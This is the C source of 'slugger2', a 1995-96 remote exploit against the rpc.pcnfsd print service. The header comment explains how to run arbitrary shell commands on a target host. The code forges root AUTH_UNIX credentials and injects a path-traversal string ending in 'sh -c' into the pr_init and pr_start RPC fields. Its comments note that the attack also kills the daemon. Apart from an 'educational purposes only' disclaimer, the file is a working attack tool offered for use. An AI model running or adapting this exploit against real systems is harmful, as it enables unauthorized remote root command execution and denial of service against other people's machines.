/* slugger2.c
 * By Josh D.  November 1st 1995 AD
 * rewritten January 31st 1996 AD
 * compile w/ pcnfsd_clnt + pcnfsd_xdr + rpcsvc
 * usage: slug2 target 'command' 
 * where:
 *    slug2 is this program.
 *    target is the target host
 *    'command' is a bourne shell command within single quotes *and*
 *       with the slash chr ('/') substituted with the A environment 
 *       variable: e.g. 'touch ${A}filename' would equate to 
 *       'touch /filename'.
 * caveat:
 * The command is limited to 27 charactars.
 * Using shell meta-charactars (!#$^&*()<>[] etc etc) in your command
 *    will cause the exploit to fail.
 * If rpc.pcnfsd was started from the rc scripts (as opposed to inetd)
 *    which it usually is: it will die after one succesful run of this
 *    program.
 * The rpc calls this code makes always fail and print the error code:
 *    '137' <<---- See 'wierd ass error' below.
 * This code always times out ont it's pr_start call because rpc.pcnfsd
 *    dies before it gets a chance to reply.  This fix for this is
 *    to make to timeout value very small for the pr_start call.
 *
 * **********************************************************************
 *
 * This code is provided for educational purposes only.
 * Neither Josh D. nor ASR take any responsibility for the use
 *    or misuse of this code.
 *
 */
 
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <arpa/inet.h>
#include <string.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <netinet/in.h>
#include "pcnfsd.h" /* this should be created by rpcgen */
 
 
int main(argc, argv)
int argc;
char **argv;
{
   
   char   myhost[200];
   int    gids[8];
   struct hostent      *dahent;
   struct sockaddr_in  daserver;
   CLIENT *datsme;
   struct pr_init_args daargs;
   struct pr_init_res *dares;
   struct pr_start_args fags;
   struct pr_start_res *figs;
   char daprinter[65]; 
   char dadir[65];    
   char dapath[255];
   struct timeval tout;
   int ranysock=RPC_ANYSOCK; 
   tout.tv_sec=60;
   tout.tv_usec=0;
 
   if (argv[3] != NULL && argv[4] != NULL)
   {  printf("bad arguments\n");
      exit(1);
   }
   if (strlen(argv[2]) > 27)
   {  printf("command must be less than 27 chars\n");
      exit(1);
   }
 
   /* this must be a valid printer */
   strcpy(daprinter, "lp");
 
   daserver.sin_family = AF_INET;
   daserver.sin_port = 0;
   dahent = gethostbyname(argv[1]);
   if (dahent == NULL)
   {  printf("gethost failed.\n");
      exit(1);
   }
   bcopy(dahent->h_addr, &daserver.sin_addr.s_addr, 4);
   
   datsme = clntudp_create(&daserver, 150001, 1, 
   tout, &ranysock);
   clnt_control(datsme, CLSET_TIMEOUT, &tout);
 
   gids[0]=0;
   gids[1]=1;
   datsme->cl_auth = authunix_create(myhost, 0, 0, 2, gids);
 
   sprintf(dapath, "..${A:=$HOME}..$A..${A}bin${A}sh -c \"%s\" ", argv[2]);
   daargs.pia_client = dapath;
   daargs.pia_printername = daprinter;
   

   /* Wierd ass error:
      whenever we pub '"' in a string for pr_init/pr_start rpcsvc
      seems to break.
      This doesn't imapir the effects of the exploit,  it simply 
      doesn't allow us to see any errors pcnfsd returns.  I don't
      plan on fixing this.  */

   /* simple minds.... */
   if ( (dares = pcnfsd_pr_init_1(&daargs, datsme)) == NULL)
   {  printf("137\n"); }
   else
   {  if (dares->pir_stat == PI_RES_OK)
         printf("Success\n");
      if (dares->pir_stat != PI_RES_OK)
      {  printf("Error: ");
         switch(dares->pir_stat)
         {
            case PI_RES_NO_SUCH_PRINTER : 
               printf("No such printer\n");
               break;
            case PI_RES_OK :
               printf("Result Ok\?\?\n");
               break;
            case PI_RES_FAIL :
               printf("Generic Failure\n");
               break;
            default :
               printf("Unknown Error\n");
         }
      }
   }
   fags.psa_client = ".";
   fags.psa_printername = daprinter;
   fags.psa_username = "root";
   fags.psa_filename = dapath;
   fags.psa_options = (argv[3] == NULL) ? "d ;>   " : "d ;<   ";
   /* simple pleasures */
   figs = pcnfsd_pr_start_1(&fags, datsme);
   if (figs == NULL)
   {  printf("137\n");
      exit(1);
   }
}
 
